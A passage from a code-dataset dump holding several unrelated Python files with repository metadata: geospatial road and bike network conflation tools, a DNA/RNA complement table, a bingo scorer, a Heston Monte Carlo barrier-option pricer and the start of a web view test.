links.rename(columns={'geometry':f'{name}_line_geo'}).set_geometry(f'{name}_line_geo')\n nodes = nodes.rename(columns={'geometry':f'{name}_point_geo'}).set_geometry(f'{name}_point_geo')\n\n return links, nodes\n\n\n\n# Match Points Function\n\n#base function\n#https://gis.stackexchange.com/questions/222315/geopandas-find-nearest-point-in-other-dataframe\n\nfrom scipy.spatial import cKDTree\n\n#take in two geometry columns and find nearest gdB point from each\n#point in gdA. Returns the matching distance too.\n#MUST BE PROJECTED COORDINATE SYSTEM\ndef ckdnearest(gdA, gdB, return_dist=True): \n \n nA = np.array(list(gdA.geometry.apply(lambda x: (x.x, x.y))))\n nB = np.array(list(gdB.geometry.apply(lambda x: (x.x, x.y))))\n btree = cKDTree(nB)\n dist, idx = btree.query(nA, k=1)\n gdB_nearest = gdB.iloc[idx].reset_index(drop=True)\n \n gdf = pd.concat(\n [\n gdA.reset_index(drop=True),\n gdB_nearest,\n pd.Series(dist, name='dist')\n ], \n axis=1)\n \n if return_dist == False:\n gdf = gdf.drop(columns=['dist'])\n \n return gdf\n\ndef match_nodes(base_nodes, base_name, join_nodes, join_name, tolerance_ft, prev_matched_nodes = None, remove_duplicates = True, export_error_lines = False, export_unmatched = False):\n \n #from each base node, find the nearest join node\n closest_nodes = ckdnearest(base_nodes, join_nodes)\n\n #filter out matched nodes where the match is greater than specified amount aka tolerence, 26ft seemed good\n matched_nodes = closest_nodes[closest_nodes['dist'] <= tolerance_ft]\n \n #print out the initial number of matches\n print(f'{len(matched_nodes)} initial matches')\n \n #if there are one to many matches, then remove_duplicates == True will only keep the match with the smallest match distance\n #set to false if you want to deal with these one to many joins manually\n if remove_duplicates == True: \n \n #find duplicate matches\n duplicate_matches = matched_nodes[matched_nodes[f'{join_name}_ID'].duplicated(keep=False)]\n \n #if two or base nodes match to the same join nodes, then only match the one with the smaller distance\n duplicate_matches_removed = matched_nodes.groupby([f'{join_name}_ID'], sort=False)['dist'].min()\n \n #used df_2 id to join back to matched nodes\n matched_nodes = pd.merge(matched_nodes, duplicate_matches_removed, how = 'inner', \n on=[f'{join_name}_ID','dist'], suffixes=(None,'_dup'))\n \n print(f'There were {len(duplicate_matches)} duplicates, now there are {len(matched_nodes)} matches.')\n \n else:\n #mark which ones have been duplicated\n duplicate_matches = matched_nodes[matched_nodes[f'{join_name}_ID'].duplicated(keep=False)]\n print(f'There are {len(duplicate_matches)} duplicate matches.')\n\n #if this is set to true, it will export a geojson of lines between the matched nodes\n #can be useful for visualizing the matching process\n if export_error_lines == True:\n #make the lines\n error_lines_geo = matched_nodes.apply(\n lambda row: LineString([row[f'{base_name}_point_geo'], row[f'{join_name}_point_geo']]), axis=1)\n #create geodataframe\n error_lines = gpd.GeoDataFrame({f\"{base_name}_ID\":matched_nodes[f\"{base_name}_ID\"],\n f\"{join_name}_ID\":matched_nodes[f\"{join_name}_ID\"],\n \"geometry\":error_lines_geo}, geometry = \"geometry\")\n #export it to file\n error_lines.to_file(\n rf'processed_shapefiles/matched_nodes/{base_name}_matched_to_{join_name}_{tolerance_ft}_errorlines.geojson', driver = 'GeoJSON')\n \n #drop join geometry and make sure base geometry active\n matched_nodes = matched_nodes.filter([f'{base_name}_ID', f'{join_name}_ID'], axis = 1)\n \n # find remaining nodes for both networks to manage which ones have been merged\n #unmatched base nodes\n unmatched_base_nodes = base_nodes[-base_nodes[f'{base_name}_ID'].isin(matched_nodes[f'{base_name}_ID'])]\n \n #unmatched join nodes\n unmatched_join_nodes = join_nodes[-join_nodes[f'{join_name}_ID'].isin(matched_nodes[f'{join_name}_ID'])]\n \n #if there was a previous match process, merge the old matching one with the new one\n if prev_matched_nodes != None:\n matched_nodes = prev_matched_nodes.append(matched_nodes) \n \n if export_unmatched == True:\n unmatched_base_nodes.to_file(rf'processed_shapefiles/conflation/matched_nodes/unmatched_{base_name}_nodes.geojson', driver = 'GeoJSON')\n unmatched_join_nodes.to_file(rf'processed_shapefiles/conflation/matched_nodes/unmatched_{join_name}_nodes.geojson', driver = 'GeoJSON')\n \n print(f'There are {len(unmatched_base_nodes)} {base_name} nodes and {len(unmatched_join_nodes)} {join_name} nodes remaining')\n print(f'{len(matched_nodes)} node pairs have been matched so far.')\n \n \n return matched_nodes, unmatched_base_nodes, unmatched_join_nodes\n\n\n# splitting base links by nearest joining nodes\n\n#this function finds the nearest point on a base link from every join node\n#this interpolated point will then be used to split the base link\ndef point_on_line(unmatched_join_nodes, join_name, base_links, base_name, tolerance_ft):\n split_points = pd.DataFrame() # dataframe for storing the corresponding interpolated point information \n line_to_split = pd.DataFrame() # dataframe for storing the correspoding base link information\n \n # loop through every unmatched point, as long as the point lies on one link of the whole newtork, it would be identified as lying on the base network\n for index, row in unmatched_join_nodes.iterrows():\n # check if row in unmatched_join_nodes distance to all linestrings in base_links\n on_bool_list = base_links[f\"{base_name}_line_geo\"].distance(row[f\"{join_name}_point_geo\"]) < tolerance_ft \n if any(on_bool_list) == True: # if this row matches to base_links feature within the tolerance\n line_idx = list(compress(range(len(on_bool_list)), on_bool_list)) # find the corresponding line\n target_line = base_links.loc[line_idx[0],f\"{base_name}_line_geo\"]\n interpolated_point = target_line.interpolate(target_line.project(row[f\"{join_name}_point_geo\"])) # find the interpolated point on the line\n unmatched_join_nodes.at[index, f\"{base_name}_lie_on\"] = \"Y\"\n split_points.at[index, f\"{base_name}_split_point_wkt\"] = str(Point(interpolated_point)).strip() \n line_to_split.at[index, f\"{base_name}_split_line_wkt\"] = str(LineString(target_line)).strip()\n split_points.at[index, f\"{join_name}_ID\"] = row[f\"{join_name}_ID\"]\n split_points.at[index, f\"{base_name}_A_B\"] = base_links.loc[line_idx[0], f\"{base_name}_A_B\"]\n line_to_split.at[index, f\"{join_name}_ID\"] = row[f\"{join_name}_ID\"]\n line_to_split.at[index, f\"{base_name}_A_B\"] = base_links.loc[line_idx[0], f\"{base_name}_A_B\"]\n else:\n unmatched_join_nodes.at[index, f\"{base_name}_lie_on\"] = \"N\"\n\n #update the unmatced nodes\n unmatched_join_nodes = unmatched_join_nodes[unmatched_join_nodes[f\"{base_name}_lie_on\"] == \"N\"].reset_index(drop = True)\n unmatched_join_nodes.drop(columns=[f\"{base_name}_lie_on\"], inplace = True)\n \n #convert everything to a geodataframe but keep wkt column\n split_points = split_points.reset_index(drop = True)\n split_points[f\"{base_name}_split_point_geo\"] = split_points[f\"{base_name}_split_point_wkt\"].apply(wkt.loads) # transform from df to gdf\n split_points = gpd.GeoDataFrame(split_points,geometry=f\"{base_name}_split_point_geo\")\n\n line_to_split = line_to_split.reset_index(drop = True)\n line_to_split[f\"{base_name}_split_line_geo\"] = line_to_split[f\"{base_name}_split_line_wkt\"].apply(wkt.loads)\n line_to_split = gpd.GeoDataFrame(line_to_split,geometry=f\"{base_name}_split_line_geo\")\n \n return split_points, line_to_split, unmatched_join_nodes\n\n\n# add node to existing links\n# idea behind:\n## step 1:return the multistring as a string first (dataframe), since multistring does not split into \n## individual linestring segment, but just add element to list of linestrings\n\n## step 2: expand list of linestring column into several rows, return a dataframe with more rows \n\n## step 3: turn the dataframe into a geodataframe\n\ndef get_linesegments(point, line): # function to split line into MultiLineString (ATTENTION: not into individual segments, but to MultiLineString)\n return line.difference(point.buffer(1e-6)) #IMPORTANT: add a buffer here make sure it works\n\ndef split_by_nodes(line_to_split, split_points, base_name):\n ab_list = split_points[f\"{base_name}_A_B\"].unique().tolist()\n line_to_split = line_to_split.drop_duplicates(subset = [f\"{base_name}_A_B\"]) # multiple points could line on the same link, drop duplicates first\n df_split = pd.DataFrame(columns = {f\"{base_name}_A_B\",f\"{base_name}_wkt\"}) # dataframe for storing splitted multistring\n df_split[f\"{base_name}_A_B\"] = ab_list\n \n for idx, row in df_split.iterrows():\n ab = row[f\"{base_name}_A_B\"]\n df_ab = split_points[split_points[f\"{base_name}_A_B\"] == ab]\n ab_point = MultiPoint([x for x in df_ab[f\"{base_name}_split_point_geo\"]])\n ab_line = line_to_split[line_to_split[f\"{base_name}_A_B\"] == ab][f\"{base_name}_split_line_geo\"].values[0]\n split_line = get_linesegments(ab_point, ab_line) # split_line is a geo multilinestring type\n # ATTENTION: format the decimal places to make every row the same, this is important for successfully turning string to geopandas geometry\n # use dump to always get 16 decimal digits irregardles of the total number of digits, dump() change it to MultiLineString to string type\n split_line = dumps(split_line) \n df_split.at[idx, f\"{base_name}_wkt\"] = split_line\n \n df_split[f'{base_name}_line_geo'] = df_split[f\"{base_name}_wkt\"].apply(wkt.loads)\n df_split = gpd.GeoDataFrame(df_split,geometry=f'{base_name}_line_geo')\n \n #convert from multilinestring to segments\n df_split = df_split.explode().reset_index(drop=True)\n \n return df_split\n\ndef split_lines_create_points(unmatched_join_nodes, join_name, base_links, base_name, tolerance_ft, export = False):\n \n #get CRS information\n desired_crs = base_links.crs\n \n #note that these function use WKT to do the splitting rather than shapely geometry\n split_points, line_to_split, unmatched_join_nodes = point_on_line(unmatched_join_nodes, join_name, base_links, base_name, tolerance_ft) #finds the split points\n print(f\"There are {len(split_points.index)} {join_name} points matching to {len(line_to_split[f'{base_name}_A_B'].unique())} {base_name} links\")\n print(f'There are {len(unmatched_join_nodes)} {join_name} nodes remaining')\n \n #splits the lines by nodes found in previous function\n split_lines = split_by_nodes(line_to_split, split_points, base_name) \n print(f'There were {len(split_lines)} new lines created.')\n \n #drop the wkt columns and A_B column for points\n split_points.drop(columns=[f'{base_name}_split_point_wkt',f'{base_name}_A_B'], inplace=True)\n split_lines.drop(columns=[f'{base_name}_wkt'], inplace=True)\n \n #project gdfs\n split_points.set_crs(desired_crs, inplace=True)\n split_lines.set_crs(desired_crs, inplace=True)\n\n if export == True:\n #write these to file\n split_lines.to_file(\"processed_shapefiles/conflation/line_splitting/split_lines.geojson\", driver = \"GeoJSON\")\n split_points.to_file(\"processed_shapefiles/conflation/line_splitting/split_points.geojson\", driver = \"GeoJSON\")\n\n return split_lines, split_points, unmatched_join_nodes\n\n\n# function to add new nodes/links\ndef add_new_links_nodes(base_links, base_nodes, new_links, new_nodes, base_name):\n\n #remove links that were splitted\n mask = -base_links[f'{base_name}_A_B'].isin(new_links[f'{base_name}_A_B'])\n base_links = base_links[mask]\n \n #add new links\n base_links = base_links.append(new_links)\n \n #rename geo col\n new_nodes = new_nodes.rename(columns={f'{base_name}_split_point_geo':f'{base_name}_point_geo'}).set_geometry(f'{base_name}_point_geo')\n \n #add split nodes to nodes with the here match\n base_nodes = base_nodes.append(new_nodes)\n \n return base_links, base_nodes\n\ndef add_attributes(base_links, base_name, join_links, join_name):\n \n #give base_links a temp column so each row has unique identifyer\n base_links['temp_ID'] = np.arange(base_links.shape[0]).astype(str)\n \n #buffer base links by 30 ft (or whatever the projected coord unit is)\n base_links['buffer_geo'] = base_links.buffer(30)\n base_links = base_links.set_geometry('buffer_geo')\n \n #export buffer for examination\n base_links.drop(columns={f'{base_name}_line_geo'}).to_file(rf'Processed_Shapefiles/conflation/add_attributes/{base_name}_buffer.geojson', driver = 'GeoJSON')\n \n #calculate initial length of join links\n join_links['original_length'] = join_links.length\n \n #perform overlay with join links\n overlapping_links = gpd.overlay(join_links, base_links, how='intersection')\n \n #overlap length\n overlapping_links['overlap_length'] = overlapping_links.length \n \n #for each base link find join link with greatest percent overlap\n overlapping_links = overlapping_links.loc[overlapping_links.groupby('temp_ID')['overlap_length'].idxmax()]\n \n #merge the join_A_B column to base_links by temp ID\n base_links = pd.merge(base_links, overlapping_links[['temp_ID',f'{join_name}_A_B']], on = 'temp_ID', how = 'left')\n \n #clean up base_links\n base_links.drop(columns=['temp_ID','buffer_geo'], inplace = True)\n \n #reset active geo\n base_links = base_links.set_geometry(f'{base_name}_line_geo')\n\n #export final result\n base_links.to_file(rf'Processed_Shapefiles/conflation/add_attributes/{base_name}_joined.geojson', driver = 'GeoJSON')\n\n return base_links\n\n\n\ndef start_node_geo(row, geom):\n return (Point(row[geom].coords.xy[0][0], row[geom].coords.xy[1][0])) \n\ndef end_node_geo(row, geom):\n return (Point(row[geom].coords.xy[0][-1], row[geom].coords.xy[1][-1]))\n\ndef add_rest_of_features(base_links,base_nodes,base_name,join_links,join_nodes,join_name):\n \n #find the nodes that are not present\n unadded_nodes = join_nodes[-join_nodes[f'{join_name}_ID'].isin(base_nodes[f'{join_name}_ID'])]\n \n #add them\n base_nodes = base_nodes.append(unadded_nodes)\n \n #find the links that are not present\n unadded_links = join_links[-join_links[f'{join_name}_A_B'].isin(base_links[f'{join_name}_A_B'])]\n \n #add them\n base_links = base_links.append(unadded_links)\n \n #merge the geometry columns into one called bikewaysim\n base_links[f'{base_name}_line_geo'] = base_links.apply(\n lambda row: row[f'{join_name}_line_geo'] if row[f'{base_name}_line_geo'] is None else row[f'{base_name}_line_geo'], axis = 1)\n \n base_nodes[f'{base_name}_point_geo'] = base_nodes.apply(\n lambda row: row[f'{join_name}_point_geo'] if row[f'{base_name}_point_geo'] is None else row[f'{base_name}_point_geo'], axis = 1)\n \n #drop the excess geo column, make sure base is set to active geometry\n base_links = base_links.drop(columns=[f'{join_name}_line_geo','original_length']).set_geometry(f'{base_name}_line_geo')\n base_nodes = base_nodes.drop(columns=[f'{join_name}_point_geo']).set_geometry(f'{base_name}_point_geo')\n \n return base_links, base_nodes\n \ndef merge_diff_networks(base_links, base_nodes, base_type, join_links, join_nodes, join_type, tolerance_ft):\n \n #notes\n #merging network could have the same nodes\n #don't mess with ref id till end\n #need to consider how many ids there will be\n \n #first find nodes that are already present and don't add them\n \n #get network names for each network\n base_cols = list(base_nodes.columns)\n base_ids = [base_cols for base_cols in base_cols if \"_ID\" in base_cols]\n \n join_cols = list(join_nodes.columns)\n join_ids = [join_cols for join_cols in join_cols if \"_ID\" in join_cols]\n \n #get list of common names between networks\n common_ids = [base_ids for base_ids in base_ids if base_ids in join_ids]\n \n #remove join_nodes that are in base_nodes\n initial_nodes = len(join_nodes)\n \n for name in common_ids:\n join_nodes = join_nodes[-join_nodes[name].isin(base_nodes[name])]\n \n final_nodes = len(join_nodes)\n print(f'{initial_nodes - final_nodes} nodes already in the base network')\n \n #add rest of join nodes to base nodes\n base_nodes = base_nodes.append(join_nodes)\n \n #get geo names\n base_line_geo = base_links.geometry.name\n base_point_geo = base_nodes.geometry.name\n join_line_geo = join_links.geometry.name\n join_point_geo = join_nodes.geometry.name\n \n #call the match nodes function to form connections between nodes\n base_nodes_to_match = base_nodes.add_suffix(f'_{base_type}').set_geometry(f'{base_point_geo}_{base_type}')\n join_nodes_to_match = join_nodes.add_suffix(f'_{join_type}').set_geometry(f'{join_point_geo}_{join_type}')\n \n print(base_nodes_to_match.geometry.isnull().any())\n print(join_nodes_to_match.isnull().any())\n \n #this isn't working\n #connections = ckdnearest(base_nodes_to_match,join_nodes_to_match)\n #connections = connections[connections['dist'] <= tolerance_ft]\n\n #only keep connections if there is not already a connection in respective column\n #for name in common_ids:\n # rem_cond = connections[f'{name}_{base_type}'] == connections[f'{name}_{join_type}']\n # connections = connections[-rem_cond]\n \n #add all the links\n base_links = base_links.append(join_links)\n \n #merge the geometry columns into one\n base_links[base_links.geometry.name] = base_links.apply(\n lambda row: row[join_links.geometry.name] if row[base_links.geometry.name] is None else row[base_links.geometry.name], axis = 1)\n \n base_nodes[base_nodes.geometry.name] = base_nodes.apply(\n lambda row: row[join_nodes.geometry.name] if row[base_nodes.geometry.name] is None else row[base_nodes.geometry.name], axis = 1)\n \n #drop the excess geo column, make sure base is set to active geometry\n base_links = base_links.drop(columns=[join_line_geo]).set_geometry(base_line_geo)\n base_nodes = base_nodes.drop(columns=[join_point_geo]).set_geometry(base_point_geo)\n\n return base_links, base_nodes#, connections\n \ndef add_reference_ids(links, nodes):\n\n #get network names\n cols = list(nodes.columns)\n id_cols = [cols for cols in cols if \"_ID\" in cols]\n names = [id_cols.split('_')[0] for id_cols in id_cols]\n \n #filter nodes\n id_cols.append(nodes.geometry.name)\n nodes = nodes[id_cols]\n \n #get name of geo column\n links_geo = links.geometry.name\n \n #match id to starting node\n links['start_point_geo'] = links.apply(start_node_geo, geom= links.geometry.name, axis=1)\n \n #set to active geo\n links = links.set_geometry('start_point_geo')\n \n #find nearest node from starting node\n links = ckdnearest(links,nodes,return_dist=False)\n \n #rename id columns to _A\n links.columns = pd.Series(list(links.columns)).str.replace('_ID','_A')\n\n #remove start node and base_node_geo columns\n links = links.drop(columns=['start_point_geo',nodes.geometry.name])\n \n #reset geometry\n links = links.set_geometry(links_geo)\n \n \n #do same for end point\n links['end_point_geo'] = links.apply(end_node_geo, geom= links.geometry.name, axis=1)\n \n #set active geo\n links = links.set_geometry('end_point_geo')\n \n #find nearest node from starting node\n links = ckdnearest(links,nodes,return_dist=False)\n \n #rename id columns to _A\n links.columns = pd.Series(list(links.columns)).str.replace('_ID','_B')\n \n #remove end point\n links = links.drop(columns=['end_point_geo',nodes.geometry.name])\n \n #reset geometry \n links = links.set_geometry(links_geo)\n\n #check for missing ref ids\n cols = list(links.columns)\n a_cols = [cols for cols in cols if \"_A\" in cols]\n b_cols = [cols for cols in cols if \"_B\" in cols]\n \n #first see any As are missing\n a_missing = links[a_cols].apply(lambda row: row.isnull().all(), axis = 1)\n \n #then see if any Bs are missing\n b_missing = links[b_cols].apply(lambda row: row.isnull().all(), axis = 1)\n \n if a_missing.any() == True | b_missing.any() == True:\n print(\"There are missing reference ids\")\n \n return links\n\n\n#%% for testing move this to jupyter notebook after\n\n\n# #this is what you edit\n# base_name = \"abm\"\n# join_name = \"here\"\n\n# base_links = gpd.read_file(r\"C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/abm/abm_bikewaysim_road_links.geojson\")\n# base_nodes = gpd.read_file(r\"C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/abm/abm_bikewaysim_road_nodes.geojson\")\n# join_links = gpd.read_file(r\"C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/here/here_bikewaysim_road_links.geojson\")\n# join_nodes = gpd.read_file(r\"C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/here/here_bikewaysim_road_nodes.geojson\")\n\n# #%% conflation steps\n\n# #get rid of excess columns\n# base_links, base_nodes = cleaning_process(base_links,base_nodes,base_name)\n# join_links, join_nodes = cleaning_process(join_links,join_nodes,join_name)\n\n# #first match the nodes, can repeat this by adding in previously matched_nodes\n# tolerance_ft = 25\n# matched_nodes, unmatched_base_nodes, unmatched_join_nodes = match_nodes(base_nodes, base_name, join_nodes, join_name, tolerance_ft, prev_matched_nodes=None)\n\n# #join the matched nodes to the base nodes once done with matching\n# matched_nodes_final = pd.merge(base_nodes, matched_nodes, on = f'{base_name}_ID', how = \"left\")\n\n# #create new node and lines from the base links by splitting lines can repeat after the add_new_links_nodes function\n# tolerance_ft = 25\n# split_lines, split_nodes, unmatched_join_nodes = split_lines_create_points(unmatched_join_nodes, join_name, base_links, base_name, tolerance_ft, export = False)\n\n# #add new links and nodes to the base links and nodes created from split_lines_create_points function\n# new_links, new_nodes = add_new_links_nodes(base_links, matched_nodes_final, split_lines, split_nodes, base_name)\n\n# #match attribute information with greatest overlap from joining links\n# new_base_links_w_attr = add_attributes(new_links, base_name, join_links, join_name)\n\n\n# #add unrepresented features from joining by looking at the attributes added in prevoius step for links and the list of matched nodes\n# added_base_links, added_base_nodes = add_rest_of_features(new_base_links_w_attr,new_nodes,base_name,join_links,join_nodes,join_name)\n\n# #merge other conflated networks into this\n# #import a bike layer\n# bike_links = gpd.read_file(r'C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/here/here_bikewaysim_bike_links.geojson')\n# bike_nodes = gpd.read_file(r'C:/Users/tpassmore6/Documents/GitHub/BikewaySimDev/processed_shapefiles/here/here_bikewaysim_bike_nodes.geojson')\n# bike_name = 'here'\n\n# #clean excess columns\n# bike_links, bike_nodes = cleaning_process(bike_links,bike_nodes,bike_name)\n\n# #merge diff netwrks\n# tolerance_ft = 25\n# merged_links, merged_nodes, connections = merge_diff_networks(added_base_links, added_base_nodes, 'road', bike_links, bike_nodes, 'bike', tolerance_ft)\n\n# # match reference IDs based on all the id in the nodes\n# refid_base_links = add_reference_ids(merged_links, merged_nodes)\n\n# #export\n# refid_base_links\n# merged_nodes\n\n\n\n\n\n","repo_name":"gti-gatech/BikewaySim","sub_path":"conflation_tools.py","file_name":"conflation_tools.py","file_ext":"py","file_size_in_byte":24918,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"71781351369","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom __future__ import unicode_literals, print_function\nimport sys\nfrom molbiox.frame.signature import Sig\n\nCHEAT = False\n\nambig_nucl = {\n 'M': 'AC',\n 'R': 'AG',\n 'W': 'AT',\n 'S': 'CG',\n 'Y': 'CT',\n 'K': 'GT',\n 'V': 'ACG',\n 'H': 'ACT',\n 'D': 'AGT',\n 'B': 'CGT',\n 'X': 'GATC',\n 'N': 'GATC',\n} + Sig('md5:916efdf0caefc4e0915fe89bc494d3e4')\n\n\nambig_nucl_gc_equiv = {\n 'B': 0.6666666666666666,\n 'D': 0.3333333333333333,\n 'H': 0.3333333333333333,\n 'K': 0.5,\n 'M': 0.5,\n 'N': 0.5,\n 'R': 0.5,\n 'S': 1.0,\n 'V': 0.6666666666666666,\n 'W': 0.0,\n 'X': 0.5,\n 'Y': 0.5,\n} + Sig('md5:1e124db4b8893fb1f240308436fa454c')\n\nambig_prot = {}\n\n# config for complementary DNA\ncomplDNA = {\n 'src': 'MNHKDGABCXYTUWRS-.mnhkdgabcxytuwrs',\n 'dest': 'KNDMHCTVGXRAAWYS-.kndmhctvgxraawys', 'outlier': '-',\n} + Sig('md5:72b8d46e58ae7cfd1268a50d66adcda5', cheat=CHEAT)\n\n\n# config for complementary RNA\ncomplRNA = {\n 'src': 'MNHKDGABCXYTUWRS-.mnhkdgabcxytuwrs',\n 'dest': 'KNDMHCUVGXRAAWYS-.kndmhcuvgxraawys', 'outlier': '-',\n} + Sig('md5:ebbe993330ececd7736b1d4f5e211e51', cheat=CHEAT)\n\ntest_data_dna = {\n '+': 'TTGATGGCTAAGAGTAAAATCTTAAAAAACACACTGGTTCTATATTTTCGTCAAGTTTTG',\n '-': 'CAAAACTTGACGAAAATATAGAACCAGTGTGTTTTTTAAGATTTTACTCTTAGCCATCAA',\n} + Sig('md5:80df1e8c8c5eba1c54fdb5857e089fef', cheat=CHEAT)\n\ntest = complRNA\n","repo_name":"frozflame/molbiox","sub_path":"molbiox/kb/transcode.py","file_name":"transcode.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"35217681757","text":"# create the tables\ndef turn_into_list():\n data = []\n try:\n with open('tables.txt', 'r') as file:\n for row in file:\n if not row.strip():\n continue\n else:\n row = [int(x) for x in row.split()]\n data.append(row)\n except Exception as e:\n print(e)\n\n # Turn every fifth list into a list\n K = 5\n res = []\n subl = []\n cnt = 0\n for sub in data:\n subl.append(sub)\n cnt = cnt + 1\n if cnt >= K:\n res.append(subl)\n subl = []\n cnt = 0\n\n return res\n\n\ntables = turn_into_list()\nnumbers_to_draw = [\n 1, 76, 38, 96, 62, 41, 27, 33, 4, 2, 94, 15, 89, 25, 66, 14, 30, 0, 71,\n 21, 48, 44, 87, 73, 60, 50, 77, 45, 29, 18, 5, 99, 65, 16, 93, 95, 37,\n 3, 52, 32, 46, 80, 98, 63, 92, 24, 35, 55, 12, 81, 51, 17, 70, 78, 61,\n 91, 54, 8, 72, 40, 74, 68, 75, 67, 39, 64, 10, 53, 9, 31, 6, 7, 47, 42,\n 90, 20, 19, 36, 22, 43, 58, 28, 79, 86, 57, 49, 83, 84, 97, 11, 85, 26,\n 69, 23, 59, 82, 88, 34, 56, 13]\nwinner_tables = []\nwin = False\n\n\n# Check for horizontal win i.e 5 marked numbers in a row\ndef check_for_horizontal_win(table, last_draw_num):\n global win\n five_x = ['x', 'x', 'x', 'x', 'x']\n for row in table:\n if row == five_x:\n sum = calculate_score(table)\n score = sum * last_draw_num\n winner_tables.append(score)\n win = True\n\n\n# Check for vertical win i.e 5 marked numbers in a coulmn\ndef check_for_vertical_win(table, last_draw_num):\n global win\n five_x = ['x', 'x', 'x', 'x', 'x']\n for i in range(5):\n vertical_sqaures = []\n for j in range(5):\n vertical_sqaures.append(table[j][i])\n if vertical_sqaures == five_x:\n sum = calculate_score(table)\n score = sum * last_draw_num\n winner_tables.append(score)\n win = True\n\n\n# Calculate the score sum of all unmarked numbers\ndef calculate_score(table):\n unbolded_num = []\n\n for i in range(5):\n for j in range(5):\n if table[i][j] != 'x':\n unbolded_num.append(table[i][j])\n return sum(unbolded_num)\n\n\ndef bingo(table):\n if len(numbers_to_draw) == 0:\n this_turns_number = [0]\n this_turns_number = numbers_to_draw[0]\n numbers_to_draw.remove(this_turns_number)\n\n for i in range(5):\n for j in range(5):\n if table[i][j] == this_turns_number:\n table[i][j] = 'x'\n\n check_for_horizontal_win(table, this_turns_number)\n check_for_vertical_win(table, this_turns_number)\n\n\nfor table in tables:\n win = False\n numbers_to_draw = numbers_to_draw = [\n 1, 76, 38, 96, 62, 41, 27, 33, 4, 2, 94, 15, 89, 25, 66, 14, 30, 0, 71,\n 21, 48, 44, 87, 73, 60, 50, 77, 45, 29, 18, 5, 99, 65, 16, 93, 95, 37,\n 3, 52, 32, 46, 80, 98, 63, 92, 24, 35, 55, 12, 81, 51, 17, 70, 78, 61,\n 91, 54, 8, 72, 40, 74, 68, 75, 67, 39, 64, 10, 53, 9, 31, 6, 7, 47, 42,\n 90, 20, 19, 36, 22, 43, 58, 28, 79, 86, 57, 49, 83, 84, 97, 11, 85, 26,\n 69, 23, 59, 82, 88, 34, 56, 13]\n while not win:\n bingo(table)\n\nprint(f'Last Winner tabel: {min(winner_tables)}')\n","repo_name":"jalalk1244/bingo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22512139348","text":"from scipy import stats\nimport numpy as np\n\nif __name__ == '__main__':\n\n # option parameters\n T = 1\n S0 = 96.0\n H = 90 # limit\n K = 100.0 # strike\n r_premia = 10 # annual interest rate\n\n # Heston model parameters\n V0 = 0.01 # initial volatility\n kappa = 2.0 # heston parameter, mean reversion\n theta = 0.01 # heston parameter, long-run variance\n sigma = omega = 0.2 # heston parameter, volatility of variance.\n # Omega is used in variance tree, sigma - everywhere else\n rho = 0.5 # heston parameter #correlation\n\n\ndef generate_heston_trajectory_return(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho, N = 1000):\n \"\"\"simulates Heston monte-carlo for Down-and-out put directly through equations\"\"\"\n r = np.log(r_premia / 100 + 1)\n dt = float(T)/float(N)\n sqrt_dt = np.sqrt(dt)\n # trajectory started\n\n # initials\n S_t = S0\n V_t = V0\n\n random_values_for_V = stats.norm.rvs(size=N)\n random_values_for_S_uncorrelated = stats.norm.rvs(size=N)\n for j in range(N):\n # random walk for V\n random_value_for_V = random_values_for_V[j]\n dZ_V = random_value_for_V * sqrt_dt\n\n # random walk for S + correlation\n random_value_for_S = rho * random_value_for_V + np.sqrt(1 - pow(rho, 2)) * random_values_for_S_uncorrelated[j]\n dZ_S = random_value_for_S * sqrt_dt\n\n # equation for V\n dV_t = kappa * (theta - V_t) * dt + sigma * np.sqrt(V_t) * sqrt_dt * dZ_V\n V_t += dV_t\n V_t = max(0,V_t)\n # equation for S\n dS_t = S_t * r * dt + S_t * np.sqrt(V_t) * dZ_S\n S_t += dS_t\n # check barrier crossing on each step\n if S_t <= H:\n return 0\n\n return max(0, K-S_t)\n\n\ndef calculate_heston_mc_price(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho, trajectories=10000):\n\n r = np.log(r_premia / 100 + 1)\n monte_carlo_price = 0.0\n mc_price_square = 0.0\n\n for i in range(trajectories):\n payoff = np.exp(-r*T) * generate_heston_trajectory_return(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho)\n monte_carlo_price += payoff\n mc_price_square += np.power(payoff, 2)\n if i % 500 == 0:\n print('trajectory', i, 'of', trajectories)\n\n variance_of_payoff = (mc_price_square - (monte_carlo_price*monte_carlo_price)/trajectories)/(trajectories-1)\n result = monte_carlo_price / float(trajectories)\n price_error = 1.96*np.sqrt(variance_of_payoff)/np.sqrt(trajectories)\n return result, price_error\n\nif __name__ == '__main__':\n import time\n paths = 100000\n res_file = open('results_mc_' + str(paths) + '.txt', 'w')\n for S0 in range(91, 136, 5):\n start_time = time.clock()\n print(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho)\n mc_price, mc_error = calculate_heston_mc_price(T, S0, H, K, r_premia, V0, kappa, theta, sigma, rho,\n trajectories=paths)\n print(\"mc_price_done for \" + str(S0))\n print('S0:', str(S0), ';', 'price', str(mc_price), ';', 'price_error:', str(mc_error), file=res_file)\n end_time = time.clock() - start_time\n print('the price is %2f, computed in %2f seconds' % (mc_price, end_time))\n print('the price is %2f, computed in %2f seconds' % (mc_price, end_time), file=res_file)\n res_file.close()\n","repo_name":"inwise/Pyrgos","sub_path":"Wiener-Hopf Bates mex/scripts/heston_mc.py","file_name":"heston_mc.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"24707179442","text":"#-*-coding: utf-8-*-\n\nfrom mock import patch, MagicMock\nfrom webob.multidict import MultiDict\nfrom pyramid.testing import (\n DummyRequest, DummyResource\n)\n\nfrom ...tests.views import BaseViewTestCase\nfrom ...views.accomodations import 